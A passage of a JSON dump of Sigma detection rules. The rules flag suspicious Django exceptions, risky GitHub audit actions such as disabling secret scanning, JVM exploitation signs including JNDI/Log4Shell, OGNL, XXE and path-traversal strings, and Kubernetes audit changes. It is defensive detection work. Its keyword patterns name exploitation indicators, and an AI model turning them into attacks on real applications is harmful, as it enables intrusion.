    "content": "title: Django Framework Exceptions\nid: fd435618-981e-4a7c-81f8-f78ce480d616\nstatus: stable\ndescription: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts\nreferences:\n    - https://docs.djangoproject.com/en/1.11/ref/exceptions/\n    - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security\nauthor: Thomas Patzke\ndate: 2017-08-05\nmodified: 2020-09-01\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: django\ndetection:\n    keywords:\n        - SuspiciousOperation\n        # Subclasses of SuspiciousOperation\n        - DisallowedHost\n        - DisallowedModelAdminLookup\n        - DisallowedModelAdminToField\n        - DisallowedRedirect\n        - InvalidSessionKey\n        - RequestDataTooBig\n        - SuspiciousFileOperation\n        - SuspiciousMultipartForm\n        - SuspiciousSession\n        - TooManyFieldsSent\n        # Further security-related exceptions\n        - PermissionDenied\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_delete_action_invoked.yml",
    "content": "title: Github Delete Action Invoked\nid: 16a71777-0b2e-4db7-9888-9d59cb75200b\nstatus: test\ndescription: Detects delete action in the Github audit logs for codespaces, environment, project and repo.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-19\nreferences:\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions\ntags:\n    - attack.impact\n    - attack.collection\n    - attack.t1213.003\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'codespaces.delete'\n            - 'environment.delete'\n            - 'project.delete'\n            - 'repo.destroy'\n    condition: selection\nfalsepositives:\n    - Validate the deletion activity is permitted. The \"actor\" field need to be validated.\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_disable_high_risk_configuration.yml",
    "content": "title: Github High Risk Configuration Disabled\nid: 8622c92d-c00e-463c-b09d-fd06166f6794\nstatus: test\ndescription: Detects when a user disables a critical security feature for an organization.\nreferences:\n    - https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions\n    - https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository\n    - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-29\nmodified: 2024-07-22\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1556\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. 
You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'business_advanced_security.disabled_for_new_repos'\n            - 'business_advanced_security.disabled_for_new_user_namespace_repos'\n            - 'business_advanced_security.disabled'\n            - 'business_advanced_security.user_namespace_repos_disabled'\n            - 'org.advanced_security_disabled_for_new_repos'\n            - 'org.advanced_security_disabled_on_all_repos'\n            - 'org.advanced_security_policy_selected_member_disabled'\n            - 'org.disable_oauth_app_restrictions'\n            - 'org.disable_two_factor_requirement'\n            - 'repo.advanced_security_disabled'\n    condition: selection\nfalsepositives:\n    - Approved administrator/owner activities.\nlevel: high\n"
  },
  {
    "path": "rules/application/github/audit/github_disabled_outdated_dependency_or_vulnerability.yml",
    "content": "title: Outdated Dependency Or Vulnerability Alert Disabled\nid: 34e1c7d4-0cd5-419d-9f1b-1dad3f61018d\nstatus: test\ndescription: |\n    Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.\n    This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-27\nreferences:\n    - https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization\ntags:\n    - attack.initial-access\n    - attack.t1195.001\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'dependabot_alerts_new_repos.disable'\n            - 'dependabot_alerts.disable'\n            - 'dependabot_security_updates_new_repos.disable'\n            - 'dependabot_security_updates.disable'\n            - 'repository_vulnerability_alerts.disable'\n    condition: selection\nfalsepositives:\n    - Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes.\nlevel: high\n"
  },
  {
    "path": "rules/application/github/audit/github_fork_private_repos_enabled_or_cleared.yml",
    "content": "title: Github Fork Private Repositories Setting Enabled/Cleared\nid: 69b3bd1e-b38a-462f-9a23-fbdbf63d2294\nstatus: test\ndescription: |\n    Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking\nauthor: Romain Gaillard (@romain-gaillard)\ndate: 2024-07-29\ntags:\n    - attack.persistence\n    - attack.exfiltration\n    - attack.t1020\n    - attack.t1537\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'private_repository_forking.clear' # An enterprise owner cleared the policy setting for allowing forks of private and internal repositories, for a repository, organization or enterprise.\n            - 'private_repository_forking.enable' # An enterprise owner enabled the policy setting for allowing forks of private and internal repositories, for a repository, organization or enterprise. Private and internal repositories are always allowed to be forked.\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_new_org_member.yml",
    "content": "title: New Github Organization Member Added\nid: 3908d64a-3c06-4091-b503-b3a94424533b\nstatus: test\ndescription: Detects when a new member is added or invited to a github organization.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-29\nreferences:\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions\ntags:\n    - attack.persistence\n    - attack.t1136.003\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'org.add_member'\n            - 'org.invite_member'\n    condition: selection\nfalsepositives:\n    - Organization approved new members\nlevel: informational\n"
  },
  {
    "path": "rules/application/github/audit/github_new_secret_created.yml",
    "content": "title: Github New Secret Created\nid: f9405037-bc97-4eb7-baba-167dad399b83\nstatus: test\ndescription: Detects when a user creates an action secret for the organization, environment, codespaces or repository.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-20\nreferences:\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'codespaces.create_an_org_secret'\n            - 'environment.create_actions_secret'\n            - 'org.create_actions_secret'\n            - 'repo.create_actions_secret'\n    condition: selection\nfalsepositives:\n    - This detection could be noisy depending on the environment. It is recommended to review new secrets when they are created and validate the \"actor\".\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_outside_collaborator_detected.yml",
    "content": "title: Github Outside Collaborator Detected\nid: eaa9ac35-1730-441f-9587-25767bde99d7\nstatus: test\ndescription: |\n    Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-20\nreferences:\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.collection\n    - attack.t1098.001\n    - attack.t1098.003\n    - attack.t1213.003\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'org.remove_outside_collaborator'\n            - 'project.update_user_permission'\n    condition: selection\nfalsepositives:\n    - Validate the actor if permitted to access the repo.\n    - Validate the Multifactor Authentication changes.\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_pages_site_changed_to_public.yml",
    "content": "title: GitHub Repository Pages Site Changed to Public\nid: 0c46d4f4-a2bf-4104-9597-8d653fc2bb55\nstatus: experimental\ndescription: |\n    Detects when a GitHub Pages site of a repository is made public. This usually is part of a publishing process but could indicate or lead to potential unauthorized exposure of sensitive information or code.\nreferences:\n    - https://docs.github.com/en/pages/getting-started-with-github-pages/creating-a-github-pages-site\n    - https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms\n    - https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events\nauthor: Ivan Saakov\ndate: 2025-10-18\ntags:\n    - attack.collection\n    - attack.exfiltration\n    - attack.t1567.001\nlogsource:\n    product: github\n    service: audit\ndetection:\n    selection:\n        action: 'repo.pages_public'\n    condition: selection\nfalsepositives:\n    - Legitimate publishing of repository pages by authorized users\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_push_protection_bypass_detected.yml",
    "content": "title: Github Push Protection Bypass Detected\nid: 02cf536a-cf21-4876-8842-4159c8aee3cc\nstatus: test\ndescription: Detects when a user bypasses the push protection on a secret detected by secret scanning.\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations\n    - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-03-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action|contains: 'secret_scanning_push_protection.bypass'\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_push_protection_disabled.yml",
    "content": "title: Github Push Protection Disabled\nid: ccd55945-badd-4bae-936b-823a735d37dd\nstatus: test\ndescription: Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations\n    - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-03-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'business_secret_scanning_custom_pattern_push_protection.disabled'\n            - 'business_secret_scanning_push_protection.disable'\n            - 'business_secret_scanning_push_protection.disabled_for_new_repos'\n            - 'org.secret_scanning_custom_pattern_push_protection_disabled'\n            - 'org.secret_scanning_push_protection_disable'\n            - 'org.secret_scanning_push_protection_new_repos_disable'\n            - 'repository_secret_scanning_custom_pattern_push_protection.disabled'\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: high\n"
  },
  {
    "path": "rules/application/github/audit/github_repo_or_org_transferred.yml",
    "content": "title: Github Repository/Organization Transferred\nid: 04ad83ef-1a37-4c10-b57a-81092164bf33\nstatus: test\ndescription: Detects when a repository or an organization is being transferred to another location.\nreferences:\n    - https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository\n    - https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership\n    - https://docs.github.com/en/migrations\n    - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration\nauthor: Romain Gaillard (@romain-gaillard)\ndate: 2024-07-29\ntags:\n    - attack.persistence\n    - attack.exfiltration\n    - attack.t1020\n    - attack.t1537\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'migration.create' # A migration file was created for transferring data from a source location (such as a GitHub.com organization or a GitHub Enterprise Server instance) to a target GitHub Enterprise Server instance.\n            - 'org.transfer_outgoing' # An organization was transferred between enterprise accounts.\n            - 'org.transfer' # An organization was transferred between enterprise accounts.\n            - 'repo.transfer_outgoing' # A repository was transferred to another repository network.\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_repository_archive_status_changed.yml",
    "content": "title: GitHub Repository Archive Status Changed\nid: dca8991c-cb16-4128-abf8-6b11e5cd156f\nstatus: experimental\ndescription: |\n    Detects when a GitHub repository is archived or unarchived, which may indicate unauthorized changes to repository status.\nreferences:\n    - https://docs.github.com/en/repositories/archiving-a-github-repository/archiving-repositories\n    - https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms\n    - https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events\nauthor: Ivan Saakov\ndate: 2025-10-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.impact\nlogsource:\n    product: github\n    service: audit\ndetection:\n    selection:\n        action:\n            - 'repo.archived'\n            - 'repo.unarchived'\n    condition: selection\nfalsepositives:\n    - Archiving or unarchiving a repository is often legitimate. Investigate this action to determine if it was authorized.\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_secret_scanning_feature_disabled.yml",
    "content": "title: Github Secret Scanning Feature Disabled\nid: 3883d9a0-fd0f-440f-afbb-445a2a799bb8\nstatus: test\ndescription: Detects if the secret scanning feature is disabled for an enterprise or repository.\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-03-07\nmodified: 2024-07-19\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'business_secret_scanning.disable'\n            - 'business_secret_scanning.disabled_for_new_repos'\n            - 'repository_secret_scanning.disable'\n            - 'secret_scanning_new_repos.disable'\n            - 'secret_scanning.disable'\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: high\n"
  },
  {
    "path": "rules/application/github/audit/github_self_hosted_runner_changes_detected.yml",
    "content": "title: Github Self Hosted Runner Changes Detected\nid: f8ed0e8f-7438-4b79-85eb-f358ef2fbebd\nstatus: test\ndescription: |\n    A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.\n    This rule detects changes to self-hosted runner configurations in the environment. Once a self-hosted runner configuration change is detected,\n    it should be validated in the GitHub UI because the log entry may not provide full context.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-27\nreferences:\n    - https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation\ntags:\n    - attack.impact\n    - attack.discovery\n    - attack.collection\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1526\n    - attack.t1213.003\n    - attack.t1078.004\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'org.remove_self_hosted_runner'\n            - 'org.runner_group_created'\n            - 'org.runner_group_removed'\n            - 'org.runner_group_runner_removed'\n            - 'org.runner_group_runners_added'\n            - 'org.runner_group_runners_updated'\n            - 'org.runner_group_updated'\n            - 'repo.register_self_hosted_runner'\n            - 'repo.remove_self_hosted_runner'\n    condition: selection\nfalsepositives:\n    - Allowed self-hosted runner changes in the environment.\n    - A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days.\n    - An ephemeral self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 1 day.\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_ssh_certificate_config_changed.yml",
    "content": "title: Github SSH Certificate Configuration Changed\nid: 2f575940-d85e-4ddc-af13-17dad6f1a0ef\nstatus: test\ndescription: Detects when changes are made to the SSH certificate configuration of the organization.\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities\n    - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority\nauthor: Romain Gaillard (@romain-gaillard)\ndate: 2024-07-29\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'ssh_certificate_authority.create' # An SSH certificate authority for an organization or enterprise was created.\n            - 'ssh_certificate_requirement.disable' # The requirement for members to use SSH certificates to access an organization resources was disabled.\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: medium\n"
  },
  {
    "path": "rules/application/jvm/java_jndi_injection_exploitation_attempt.yml",
    "content": "title: Potential JNDI Injection Exploitation In JVM Based Application\nid: bb0e9cec-d4da-46f5-997f-22efc59f3dca\nstatus: test\ndescription: Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\n    - https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'com.sun.jndi.ldap.'\n        - 'org.apache.logging.log4j.core.net.JndiManager'\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/jvm/java_local_file_read.yml",
    "content": "title: Potential Local File Read Vulnerability In JVM Based Application\nid: e032f5bc-4563-4096-ae3b-064bab588685\nstatus: test\ndescription: |\n    Detects potential local file read vulnerability in JVM based apps.\n    If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords_local_file_read:\n        '|all':\n            - 'FileNotFoundException'\n            - '/../../..'\n    condition: keywords_local_file_read\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/jvm/java_ognl_injection_exploitation_attempt.yml",
    "content": "title: Potential OGNL Injection Exploitation In JVM Based Application\nid: 4d0af518-828e-4a04-a751-a7d03f3046ad\nstatus: test\ndescription: |\n    Detects potential OGNL Injection exploitation, which may lead to RCE.\n    OGNL is an expression language that is supported in many JVM based systems.\n    OGNL Injection is the root cause of some high profile RCEs such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134).\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2017-5638\n    - cve.2022-26134\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'org.apache.commons.ognl.OgnlException'\n        - 'ExpressionSyntaxException'\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/jvm/java_rce_exploitation_attempt.yml",
    "content": "title: Process Execution Error In JVM Based Application\nid: d65f37da-a26a-48f8-8159-3dde96680ad2\nstatus: test\ndescription: Detects process execution related exceptions in JVM based apps, which often relate to RCE.\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'Cannot run program'\n        - 'java.lang.ProcessImpl'\n        - 'java.lang.ProcessBuilder'\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/jvm/java_xxe_exploitation_attempt.yml",
    "content": "title: Potential XXE Exploitation Attempt In JVM Based Application\nid: c4e06896-e27c-4583-95ac-91ce2279345d\nstatus: test\ndescription: Detects XML parsing issues. If the application expects to work with XML, make sure that the parser is initialized safely.\nreferences:\n    - https://rules.sonarsource.com/java/RSPEC-2755\n    - https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'SAXParseException'\n        - 'DOMException'\n    condition: keywords\nfalsepositives:\n    - If the application expects to work with XML there may be parsing issues that don't necessarily mean XXE.\nlevel: high\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_change_admission_controller.yml",
    "content": "title: Kubernetes Admission Controller Modification\nid: eed82177-38f5-4299-8a76-098d50d225ab\nrelated:\n    - id: 6ad91e31-53df-4826-bd27-0166171c8040\n      type: similar\nstatus: test\ndescription: |\n    Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://security.padok.fr/en/blog/kubernetes-webhook-attackers\nauthor: kelnage\ndate: 2024-07-11\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1078\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.007\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        objectRef.apiGroup: 'admissionregistration.k8s.io'\n        objectRef.resource:\n            - 'mutatingwebhookconfigurations'\n            - 'validatingwebhookconfigurations'\n        verb:\n            - 'create'\n            - 'delete'\n            - 'patch'\n            - 'replace'\n            - 'update'\n    condition: selection\nfalsepositives:\n    - Modifying the Kubernetes Admission Controller may need to be done by a system administrator.\n    - Automated processes may need to take these actions and may need to be filtered.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_cronjob_modification.yml",
    "content": "title: Kubernetes CronJob/Job Modification\nid: 0c9b3bda-41a6-4442-9345-356ae86343dc\nrelated:\n    - id: cd3a808c-c7b7-4c50-a2f3-f4cfcd436435\n      type: similar\nstatus: test\ndescription: |\n    Detects when a Kubernetes CronJob or Job is created or modified.\n    A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule.\n    An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob\nauthor: kelnage\ndate: 2024-07-11\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.execution\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        objectRef.apiGroup: 'batch'\n        objectRef.resource:\n            - 'cronjobs'\n            - 'jobs'\n        verb:\n            - 'create'\n            - 'delete'\n            - 'patch'\n            - 'replace'\n            - 'update'\n    condition: selection\nfalsepositives:\n    - Modifying a Kubernetes Job or CronJob may need to be done by a system administrator.\n    - Automated processes may need to take these actions and may need to be filtered.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_deployment_deleted.yml",
    "content": "title: Deployment Deleted From Kubernetes Cluster\nid: 40967487-139b-4811-81d9-c9767a92aa5a\nstatus: test\ndescription: |\n    Detects the removal of a deployment from a Kubernetes cluster.\n    This could indicate disruptive activity aiming to impact business operations.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1498\n    - attack.impact\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'delete'\n        objectRef.resource: 'deployments'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_events_deleted.yml",
    "content": "title: Kubernetes Events Deleted\nid: 3132570d-cab2-4561-9ea6-1743644b2290\nrelated:\n    - id: 225d8b09-e714-479c-a0e4-55e6f29adf35\n      type: derived\nstatus: test\ndescription: |\n    Detects when events are deleted in Kubernetes.\n    An adversary may delete Kubernetes events in an attempt to evade detection.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'delete'\n        objectRef.resource: 'events'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
